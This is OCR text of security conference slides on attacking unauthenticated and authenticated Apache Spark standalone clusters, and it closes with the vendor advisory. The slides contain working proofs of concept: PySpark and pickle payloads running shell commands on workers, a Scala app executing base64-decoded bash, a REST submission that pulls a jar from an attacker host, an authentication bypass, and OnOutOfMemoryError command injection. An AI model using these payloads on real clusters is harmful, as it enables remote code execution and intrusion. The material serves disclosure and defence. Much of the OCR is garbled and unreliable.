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Apache Hadoop Framework 


e.g. Word count 


import java.io.IOException; 
import java.util.StringTokenizer; 


import org.apache.hadoop.conf.Configuration; 

import org.apache.hadoop.fs.Path; 

import org.apache.hadoop.io.IntWritable; 

import org.apache.hadoop.io.Text; 

import org.apache.hadoop.mapreduce.Job; 

import org.apache.hadoop.mapreduce.Mapper; 

import org.apache.hadoop.mapreduce.Reducer; 

import org.apache.hadoop.mapreduce.lib.input.FileInputFormat; 
import org.apache.hadoop.mapreduce.lib.output.FileOutputFormat; 


public class WordCount ( 


public static class TokenizerMapper 
extends Mapper<Object, Text, Text, IntWritable>{ 


private final static IntWritable one = new IntWritable(1); 
private Text word - new Text(); 


public void map(Object key, Text value, Context context 
) throws IOException, InterruptedException { 
StringTokenizer itr - new StringTokenizer(value.toString()); 
while (itr.hasMoreTokens()) { 
word.set(itr.nextToken()); 
context.write(word, one); 


} 


e.g. Word count 


public static class IntSumReducer 
extends Reducer<Text,IntWritable,Text,IntWritable> { 
private IntWritable result = new IntWritable(); 


public void reduce(Text key, Iterable<IntWritable> values, 
Context context 
) throws IOException, InterruptedException { 
int sum = O; 
for (IntWritable val : values) { 
sum += val.get(); 


result.set(sum); 
context.write(key, result); 


} 
} 


public static void main(String[] args) throws Exception { 
Configuration conf = new Configuration(); 
Job job = Job.getInstance(conf, "word count"); 
job.setJarByClass(WordCount.class); 
job.setMapperClass(TokenizerMapper.class) ; T 
job.setCombinerClass (IntSumReducer.class); 
job.setReducerClass (IntSumReducer.class); 
job.setOutputKeyClass(Text.class); 
job.setOutputValueClass(IntWritable.class); 
FileInputFormat.addInputPath(job, new Path(args[0])); 
FileOutputFormat.setOutputPath(job, new Path(args[1])); 
System.exit(job.waitForCompletion(true) ? 9 : 1); 
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park 


import org.apache.spark.{SparkContext, SparkConf} 


val sc = new SparkContext(new SparkConf()) 

val textFile = sc.textFile("hdfs://...") 

val counts = textFile.flatMap(line => line.split(" ")) 
„map(word => (word, 1)) 
.reduceByKey(_ + _) 

counts.saveAsTextFile("hdfs://...") 
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Security in Spark is OFF by default. 
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How does it work? 


3xn Executors 


Worker 1 


Spark RPC 


APACHE 


Worker 2 
Cluster 


Manager Egg 
RPC/7077 . 


HTTP/8081 
RPC/<rand> 


HTTP/8080 


Spark Master UI: 8080 


ik ,,, Spark Master at spark://192.168.1.24:7077 
URL: spark://192.168.1.24:7077 

Alive Workers: 2 

Cores in use: 2 Total, 2 Used 

Memory in use: 5.7 GB Total, 2.0 GB Used 

Applications: 1 Running, 0 Completed 

Drivers: O Running, 0 Completed 

Status: ALIVE 


Spa 


4.3 


v Workers (3) 
Worker Id Address 
worker-20200207221005-192.168.1.29-37330 192.168.1.29:37330 
worker-20200207221415-192.168.1.29-37292 192.168.1.29:37292 
worker-20200207221756-192.168.1.36-37963 192.168.1.36:37963 


v Running Applications (1) 


Cores 

1 (0 Used) 
1 (1 Used) 
1 (1 Used) 


Application ID Name Cores Memory per Executor Submitted Time 


app-20200207222458-0000 (kill) Score Job 2 1024.0 MB 2020/02/07 22:24:58 


Memory 

2.9 GB (0.0 B Used) 

2.9 GB (1024.0 MB Used) 
2.9 GB (1024.0 MB Used) 


User State 


lambda RUNNING 


Client mode: 3xn Executors 


Driver is running on your laptop 


Worker 1 


Spark RPC 


Da | Worker 2 
Manager RPC/<rand> 


HTTP/4040 RPC/7077 E 
RPC/<rand> HTTP/8080 
RPC/<rand> 


Recon 


> spark aws ec2 describe-instances | 
--filter 'Name-tag:Name, Values=*spark*master*' \ 
--query 'Reservations[].Instances[].PrivateIpAddress' 


[ 
"172.31.29.239", 
172.31.26.231, 
1172.31. 16.251; 
> spark 


> spark kubectl get pods -o="custom-columns=\ 
POD: .metadata.name, \ 
PODIP:.status.podIP" | grep "*spark*master" 


POD IP 
spark-master-6855784c-f438k 172.18.0.5 


root@attack:~# nmap -A -sV 192.168.1.24 -p 7077 --open 

Starting Nmap 7.88 ( https://nmap.org ) at 2020-02-08 10:21 CET 

Stats: 0:00:27 elapsed; © hosts completed (1 up), 1 undergoing Service Scan 
Service scan Timing: About 0.00% done 

Nmap scan report for (192.168.1.24) 

Host is up (0.00030s latency). 


PORT STATE SERVICE VERSION 
7077/tcp open unknown 


200000B5 72 69 6e 67 3b 78 70 74 OO 06 Ac 
00000000 00 00 00 00 00 00 OO 


00000010 2e 00 00 00 2f 
00000015 aced000573720011 6a 61 76 61 2e 6c 61 6e ....sr.. Java.lan 
00000025 67 2e 42 6f 6f 6c 65 61 Ge cd 20 72 80 d5 9c fa g.Boolean.r.... 


= 
Driver 
Manager 


00 00 00 00 00 00 00 C3 05 de ad be ef de ad be ef 
00 00 00 0 


00000010 2e 00 00 00 2f 
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e6c616e ...sr.. java.lan 
00000025 6/ 2e 42 6۲ 6f 6c 65 61 6e cd 20 72 80 d5 9cfa q.Boolea n. r.... 


Spark/core/src/main/scala/org/apache/spark/rpc/netty/RpcEndpointVerifier.scala 
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00000000 00 OO 00 00 00 00 00 44 04 6۲ f6 cf 3a 47 11 e3 … … 
00000010 2e 00 00 00 2f 

00000015 ac ed 00 05 73 7200 11 6a 61 76 61 2e 6c 61 6e ....sr.. java.lan 
00000025 67 2e 42 6f 6۲ 6c 65 61 6e cd 20 72 80 d5 9cfa a.Boolea n. r.... 


Driver 
Manager 


00 00 00 00 00 00 00 C3 05 de ad be ef de ad be ef 
00 00 00 0 


Serialized(CheckExistence(name="master")) 
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6f f6 cf 3a 4711 e3 


00000010 2e 00 00 OO 2f 
00000015 aced000573720011 6a6176612e6c616e ....sr.. java.lan 
00000025 67 2e 42 6f6f6c6561 6e cd 20 72 80 d5 9cfa q.Boolea n. r.... 


janage 
Driver 
Manager 


00 00 00 00 00 00 00 C305 6f f6 cf 3a 47 11 e3 2e 
00 00 00 bO 


ees 


Serialized(CheckExistence(name="master")) 


سح 


00 00 00 00 00 00 00 4404 6f f6 cf 3a 47 11 e3 2e 
00 00 00 2f 
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20000C 2 69! 3b 7 JA 00064d617374 6572 ring;xpt „Master 
“00000000 00 00 00 00 00 00 00 44 04 6f f6 "T 3a 47 11 e3 = 
00000010 2e 00 00 00 2f wd 
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 Oe 
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Driver 
Manager 


00 00 00 00 00 00 00 C305 6f f6 cf 3a 47 11 e3 2e 
00 00 00 bO 


es 


Serialized(CheckExistence(name="master")) 


cec 


00 00 00 00 00 00 00 44 04 6f f6 cf 3a 47 11 e3 2e 
00 00 00 2f 


ccc 


Serialized(Java.lang.Boolean()) 


root@attack:~# m 


Our first attempt at code exec 


from pyspark import SparkContext, SparkConf 


conf = SparkConf() 

conf = conf.setAppName("Wordcount" ) 

conf = conf.setMaster("spark://192.168.1.37:7077") 
conf = conf.set("spark.driver.host", "192.168.1.22") 


sc = SparkContext(conf=conf) 


from subprocess import Popen, PIPE 
print(Popen(["id"], stdout=PIPE).stdout.read()) 


> code python poc.py 

20/02/08 14:58:37 WARN NativeCodeLoader: Unable to load native-hadoop library for your platf: 
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties 

Setting default log level to "WARN". 

To adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel). 


uid-1000(ayoul3) gid-1000(ayoul3) groups-1000(ayoul3),4(adm),20(dialout),24(cdrom),25(floppy 
8(lxd),114(netdev) 


> code 
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Spark APIs 


open("input.txt", "r") 


input = sc.textFile("input.txt") — 


input 


input = [1, 2, 3, 4, 5] 


EN [1.2.3] 
input - sc.parallelize([1, 2, 3, 4, 51) MI MU 


Resilient Distributed Datasets (RDD) 


Transformations 


input = sc.parallelize([1, 2, 3, 5, 4]) 


def multiply(x): | 
return x*20 C computed yet! 


res = input.map(multiply) ۳۳ ze, 40, se 
22 (eo, 100) 


Nothing gets sent to the workers just yet 


Directed Acyclic Graph (DAG) 


parallelize 


filterMap 


Collect => Graph sent to the executors 


Worker 1 


Partition 1 


Driver 


Partition 2 


Worker 1 


Driver 


Worker 2 


Partition 1: 
[20 40 60] | Worker 1 


Driver 


[20, 40, 60, 80, 100] Partition 2: | Worker 2 


[80, 100] 


from pyspark import SparkContext, SparkConf 
from subprocess import Popen, PIPE 


conf = SparkConf() 

conf = conf.setAppName("Wordcount" ) 

conf = conf.setMaster("spark://192.168.1.37:7077") 
conf = conf.set("spark.driver.host", "192.168.1.22") 
sc = SparkContext(conf=conf) 


input = sc.parallelize([1, 2, 3, 4, 5]) 
res = input.map(lambda x: Popen(["id"], stdout=PIPE).stdout.read()) 


for a in res.collect(): 
print(a) 


> sparky git:(master) > 


ubuntu@ip-172-31-29-239:»/sparky$ „ 


> sparky git:(master) > 


version = utf8_deserializer.loads(infile) 
if version != "%d.%d" % sys.version info[:2]: 
raise Exception(("Python in worker has different version %s than th 
"driver %s, PySpark cannot run with different mino 
"Please check environment variables PYSPARK_PYTHON 
"PYSPARK_DRIVER_PYTHON are correctly set.") % 
("%d.%d" % sys.version info[:2], version)) 


Python version on driver == Python version on executors 


File "/opt/spark/python/lib/pyspark.zip/pyspark/worker.py", line 267, in main 
("%d.%d" % sys.version info[:2], version) ) 


Exception: Python in worker has different version! 3.5 than that in driver 3.71 PySpark cal 


versions.Please check environment variables PYSPARK PYTHON and PYSPARK DRIVER PYTHON are 


at org.apache.spark.api.python.BasePythonRunner$ReaderIterator.handlePythonExcept: 
at org.apache.spark.api.python.PythonRunner$$anon$1.read(PythonRunner.scala:588) 
at org.apache.spark.api.python.PythonRunner$$anon$1.read(PythonRunner.scala:571) 
at org.apache.spark.api.python. BasePythonRurher$ReaderIterator . hasNext (PythonRunni 


import sys, collections, os 


myver = collections.namedtuple("myver", "major, minor, micro, releaselevel, serial") 


sys.version info = myver(major=3, minor=5, micro=0, releaselevel="final", serial=®) 


sc = SparkContext(conf=conf) 


input = sc.parallelize([1, 2, 3, 4, 5]) 
res = input.map(lambda:..) 
res.Collect().. 


import sys, collections, os 


myver = collections.namedtuple("myver", "major, minor, micro, releaselevel, serial") 


sys.version info = myver(major=3, minor=5, micro=0, releaselevel-"final", serial=®) 


class hey(object): 
def reduce (self): 
return (os.system, ("echo Pwned > /tmp/out.txt",)) 


def multiplyMe(self, x): 
return x * 20 


res = input.map(hey().multiplyMe) 


» code spark@worker3:~$ m 
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Driver 


Register Application 


RPC/7077 


Assign workers, 
reports application status, etc. 


RPC/«Scheduler Port» 


RPC/<BlockManager Port» 


Assign to apps, driver 
info, heartbeat, etc. 


Register executor 


Retrieve data blocks 


Option 1: using the right ports 


conf 


= SparkConf() 
conf = conf.setAppName( "Wordcount" ) 
conf = conf.set("spark.driver.port", 8080) 
conf = conf.set("spark.blockManager.port", 8443) 


Option 2: cluster mode 


Worker 1 


Spark RPC 


APACHE 


Worker 2 


Cluster 


Manager 


RPC/7077 Worker n 


We only need access to port 7077! 


object SimpleApp { 
def makeInt(s: String): Try[Int] = Try(s.trim.toInt) 
… Snip … 


def executeOnSpark(cmd: String, numTasks: Int) ={ 
val sc = new SparkContext(new SparkConf()) 
val myList = sc.parallelize(List.range(®, numTasks), numTasks) 
val output = myList.map( x => (s"echo -ne $cmd" | "base64 -d" | "bash")!!) 
output.collect().zipWithIndex.foreach( case (e, i) => println(s"[+] worker $i\n$e\n====== 


w SIE: au 
def main(args: Array[String]) { 
val numTasks - (args.lift(1) match ( 
case Some(x:String) => (makeInt(x) match{ 
case Success(x) => x 
case _ => 1 


case _ => 1 


executeOnSpark(args(0), numTasks) 


} 


> res git:(master) > ls 
simpleApp.jar 


daemons and applications, so this deployment configuration is not as secure as the above, especially 


configuration, a user with the secret can effectively impersonate any other user. 


The Rest Submission Server and the MesosClusterDispatcher do not support authentication. You sho 
REST API 8 MesosClusterDispatcher (port 6066 and 7077 respectively by default) are restricted to hd 


?status=[active|complete|pending|failed] list only stages in the state. 


Endpoint Meaning 


/applications A list of all applications. 
?status-[completed|running] list only applications in the chosen state. 
?minDate=[date] earliest date/time to list. 
Examples: 
?minDate=2015-02-10 
?minDate=2015-02-03T16:42:40.000GMT 
?maxDate= [date] latest date/time to list; uses same format as minDate. 
?1imit-[limit] limits the number of applications listed. 


/applications/[app-id]/jobs A list of all jobs for a given application. 
?status=[running|succeeded|failed|unknown] list only jobs in the 


specific state. 
/applications/[app-id]/jobs/[job-id] Details for the given job. 


/applications/[app-id]/stages A list of all stages for a given application. 


private def buildDriverDescription(request: CreateSubmissionRequest): DriverDescription = { 
// Required fields, including the main class because python is not yet supported 


val appResource = Option(request.appResource).getOrElse { 


throw new SubmitRestMissingFieldException( "Application jar is missing.") 


val mainClass = Option(reguest.mainCLass).getOrElse 4 


throw new SubmitRestMissingFieldException("Main class is missing.") 


// Optional fields 

val sparkProperties - reguest.sparkProperties 

val driverMemory - sparkProperties.get(config.DRIVER MEMORY.key) 

val driverCores - sparkProperties.get(config.DRIVER CORES.key) 

val driverDefaultJavaOptions = sparkProperties.get(SparkLauncher.DRIVER DEFAULT JAVA OPTIONS) 
val driverExtraJavaOptions = sparkProperties.get(config.DRIVER JAVA OPTIONS.key) 

val driverExtraClassPath - sparkProperties.get(config.DRIVER CLASS PATH.key) 

val driverExtraLibraryPath - sparkProperties.get(config.DRIVER LIBRARY PATH.key) 

val superviseDriver - sparkProperties.get(config.DRIVER SUPERVISE.key) 


POST http://192.168.1.96:6066/v1/submissions/create 


{ 


"action": "CreateSubmissionRequest", 
"appResource": “http://192.168.1.22:9090/simpleApp. jar 
"mainClass": "SimpleApp", 
"appArgs": [ 
"ZWNobyBwd251ZCA4*IC90bXAvb3VOLnRAdA--" 
IF 


"clientSparkVersion": "2.4.3", 

"environmentVariables": ( 
"SPARK ENV LOADED": "1" 

Jo 

"sparkProperties": { 
"spark.master": "spark://192.168.1.96:7077", 
"spark.driver.supervise": "false", 
"spark.app.name": "Word Count", 
"spark.submit.deployMode": "cluster", 
"spark.jars": "http://192.168.1.22:9090/simpleApp. 


jar 


> res git:(master) m 


curl -X POST http://spark-cluster-ip:6066/v1/submissions/create --header "Content-Type:application/json;charset-UTF-8" --data '{ 
"CreateSubmissionRequest", 
"appArgs" : [ "myAppArgument1" ], 
"appResource" : "file:/myfilepath/spark-job-1.0.jar", 
"clientSparkVersion" : "1.5.0", 
"environmentVariables" : { 


"SPARK ENV LOADED" : "1" 


"mainClass" : "com.mycompany.MyJob", 
"sparkProperties" : ( 
^nk.jars" : "file:/myfilepath/spark-job-1.0.jar", 


<.driver.supervise 
jark.app.name" 


<.eventLog.enabled": "true", 


<. submit.deployMode" : "cluster", 


c.master” : "spark://spark-cluster-ip:6066" 


https://gist.github.com/arturmkrtchyan/5d8559b2911ac951d34a 


AFF 


Zil NERA FEI SED REST DMB, XML CEST, 


提交 方式 有 两 种 : 


1. 利用 REST API 
2. 利用 submissions 网 关 (集成 在 7077 端 口中 ) 


应 用 可 以 是 java 或 Python， 融 是 一 个 最 简单 的 类 ， 如 (参考 链接 1) : 


java.io.BufferedReader; 
java.io.InputStreamReader; 


Exploit { 


https://github.com/vulhub/vulhub/tree/master/spark/unacc 


Apache Spark Unauthenticated Command Execution 


Disclosed Created 


12/12/2017 03/19/2019 


Description 


This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone 
cluster mode through REST API. It uses the function CreateSubmissionRequest to submit a malious java class 


and trigger it. 


Author(s) 


Fengwei Zhang 

Imran Rashid 

aRe00t 

Green-m <greenm.xxoo@gmail.com> 


exploit/linux/http/spark_unauth_rce 


Authentication 


# /opt/spark/conf/spark-defaults.conf 


spark.authenticate = true 
spark.authenticate.secret = BBBBBBB 


point tV E rifie ER rS( ( | mae kE 5 XIS t Inis L.. (OD joans 
a/l | java. Ene ‚IllegalStateException: 
Expected ST received something else (maybe your client does not have SASL 
enabled?) 
at org.apache.spark.network.sasl.SaslMessage.decode(SaslMessage.java:69) 
at org.apache.spark.network.sasl.SaslRpcHandler.receive(SaslRpcHandler.java: 


90) 

at 
org.apache.spark.network.server.TransportReguestHandler.processRpcReguest(Trans 
portReguestHandler.java:180) 

at 
org.apache.spark.network.server.TransportReguestHandler.handle(TransportReguest 
Handler.java:103) 

at 
org.apache.spark.network.server.TransportChannelHandler.channelRead(TransportCh 
annelHandler.java:118) 


at 


Cluster 
Driver 
Manager 


00 00 00 00 00 00 00 2B 03 de ad be ef de ad be ef 
00 00 00 bo [...] SparkSaslUser 


00 00 00 00 00 00 00 af 04 


nonce = "eerererer" 
realm="default" 
gop-"auth-conf” 
cipher="des, 3des, rc4" 
algorithm="md5-sess" 


Half_A1 = md5(b64 username, :, realm, : ,b64 secret) 
A1 = md5(Half_A1, :, srvNonce, :, cliNonce) 


A2 = md5(" AUTHENTICATE:null/default") 
Response = md5(A1, :, servNonce, :00000001:, cliNonce, ":auth:", A2 ) 


Described in RFC 2831 


Cluster 
Driver 
Manager 


00 00 00 00 00 00 00 2B 03 deadbeefdeadbe ef 
00 00 00 bo [...] SparkSaslUser 


00 00 00 00 00 00 00 af 04 


realm="default" 

nonce = "eerererer" 
qop="auth-conf" 
cipher="des, 3des, rc4" 
algorithm="md5-sess" 


——— o o — o  —* 


realm="default", response, cnonce, etc. 


سس( 


rspauth=... 


000000EC 
000000FC 
00000101 
00000111 


00 00 00 00 00 00 44 
00 00 00 2f 

ed 00 05 73 72 00 11 
2e 42 6f 6f 6c 65 61 
02 00 01 5a 00 05 76 


04 79 f7 Of d3 58 79 61 


6a 61 76 61 2e 6c 61 6e 
6e cd 20 72 80 d5 9c fa 
61 6c 75 65 78 70 01 


Po Java La 
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Cluster 
Driver 
| Manager 
00 00 00 00 000 00 Oa 14 09 00 00 Oa 07 
Serialized(RegisterApplication) 


00 00 00 00 00 00 04 98 09 00 00 04 8b 
Serialized(RegisteredApplication) 


Auth bypass is a sure thing 


11732 11634 81 89:51 pts/1 00:00:;£ ib/ivm/iava-8-open snidk-andst/ jre/bin/ Java 
-cp /opt/spark/conf/:/opt/spark/jars/* -Xmx1024M Dspark.driver.port 
-8080 -Dspark.authenticate-true org.apache. spark le EXE De alter orBackend --driver-url 
spark://CoarseGrainedScheduler0192.168.1.22:8080 Z id 6 anc 192.168.1.37 --cores 1 
--app-id app-20200215095118-0005 --worker-url spark://Worker0192.168.1.37:34727 


Cluster 
Driver 
| Manager 
00 00 00 00 00 00 Oa 14 09 00 00 Oa 07 
Serialized(RegisterApplication) 


00 00 00 00 00 00 04 98 09 00 00 04 8b 
Serialized(RegisteredApplication) 


Auth bypass is a sure thing 
RCE is a definite maybe 


[spark] ApplicationDescription( 
name: String 
maxCores: Option[ ] 
memoryPerExecutorMB: 
appUiUrl: String 
eventLogDir: Option[URI] - None 
// short name of compression codec used when writing event logs, if any (e.g. lzf) 
eventLogCodec: Option[String] - None 
coresPerExecutor: Option[ ] = None 
// number of executors this application wants to start with, 


// only used if dynamic allocation is enabled 


= initialExecutorLimit: Option[ ] = None 


private[spark] case class Command( 
mainClass: String, 
arguments: Seq[ String], 
environment: Map[String, String], 
classPathEntries: Seg[ String], 
libraryPathEntries: Seg[ String], 


javaOpts: Seg[String]) { 


11732 11634 81 89:51 pts/1 00:00:02 /usr/lib/ivm/iava-8-openidk-amd64/ire bin java 

-cp /opt/spark/conf/:/opt/spark/jars/* -Xmx1024M 

-8080 -Dspark.authenticate=true org.apache. spark executor.CoarseGrainedExecutorBackend --driver-ur 

spark://CoarseGrainedScheduler(0192.168.1.22:8080 --executor-id © --hostname 192.168.1.37 --cores 1 
--app-id app-20200215095118-0005 --worker-url spark://Worker@192.168.1.37:34727 


You can use this Oracle HotSpot option to run commands when a java.lang.OutOfMemoryError is thrown. This opti 


recognized by OpenJ9 and provided for compatibility. 
N 


Syntax 


-XX :OnOutOfMemoryError="<command string»" 


Setting Set the maximum size of the heap. 
maximum 


heap size 


conf = SparkConf() 

conf = conf.setAppName( "Wordcount") 

conf = conf.set( 
"spark.executor.extraJavaOptions", 
"-Xmx : Im -XX:OnOutOfMemoryErrorz«cmd»" 


sparky git:(master) > > ~ NC -l 2222, 


“ TransportRequestHandler java X  AuthRpcHandler.java 


common > network-common > src > main > java > org > apache > spark > network > server > £: TransportReguestHandler.java > Y Transpo 


99 @Override 

100 public void handle(RequestMessage request) { 

101 if (request instanceof RpcRequest) { 

102 processRpcRequest((RpcRequest) request); 

183 else if (request instanceof OneWayMessage 

"I SET v NNI 
105 else if (request instanceof StreamRequest 

106 processStreamRequest((StreamRequest) request); 

107 ) else if (request instanceof UploadStream) { 

108 processStreamUpload((UploadStream) request); I 
109 } else { 

110 throw new IllegalArgumentException("Unknown request type: " + request); 

111 } 


112 } 


TransportRequestHandler.java X =: AuthRpcHandler.java 


common > network-common > src > main > java > org > apache > spark > network > server > ^ TransportReguestHandler.java > €2 TransportReg 


239 
240 
241 
242 
243 
244 
245 
246 
247 
248 
249 
250 
251 


252 
252 


} finally { 
reg.meta.release(); 
) 
} 


private void processOneWayMessage(OneWayMessage req) { 


rpcHandler.receive(reverseClient, req.body().nioByteBuffer()); 
- "(ers a z 
logger.error("Error while invoking RpcHandler#receive() for one-way message.", e); 
} finally { 
reg.body().release(); 


) 
) 


& TransportRequestHandler.java ^ AuthRpcHandler.java X 


common > network-common > src > main > java > org > apache > spark > network > crypto > ^ AuthRpcHandler.java > ۶ AuthRpcHandler > © receiveStrean 


84 public void receive(TransportClient client, ByteBuffer message, RpcResponseCallback callback) { 
85 if (doDelegate) { 

86 delegate.receive(client, message, callback); 

87 return; 

88 } 

89 

90 int position - message.position(); 

91 int limit - message.limit(); 

92 

93 ClientChallenge challenge; 

94 try { 

95 challenge - ClientChallenge.decodeMessage(message); 

96 LOG.debug("Received new auth challenge for client ().", channel.remoteAddress()); 
97 } catch (RuntimeException e) { 

98 if (conf.saslFallback()) { 

99 LOG.warn( “Failed to parse new auth challenge, reverting to SASL for client {}.", 
100 channel.remoteAddress()); 

101 delegate - new SaslRpcHandler(conf, channel, delegate, secretKeyHolder); 

102 message.position(position); I 
103 message.limit(limit); 

104 delegate.receive(client, message, callback); 

105 doDelegate - true; 

106 } else ( 


107 LOG.debue("Unexpected challenge message from client ۲۲۰ closing channel.". 


Severity: Important 
Vendor: The Apache Software Foundation 
Versions Affected: 

e Apache Spark 2.4.5 and earlier 


Description: 


In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication 


(spark. authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an 
application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host 
machine. 


This does not affect Spark clusters using other resource managers (YARN, Mesos, etc). 
Mitigation: 


e Users should update to Spark 2.4.6 or 3.0.0. 
e Where possible, network access to the cluster machines should be restricted to trusted hosts only. 


Credit: 


e Ayoub Elaassal 


Spark is awesome! 


Too bad security is not taken seriously 


Spark is awesome! 


Too bad security is not taken seriously 


We only covered Spark Standalone mode 


上 )0 5۷0۱۱13 _ 
Ask | e github.com/ayoul3/sparky 


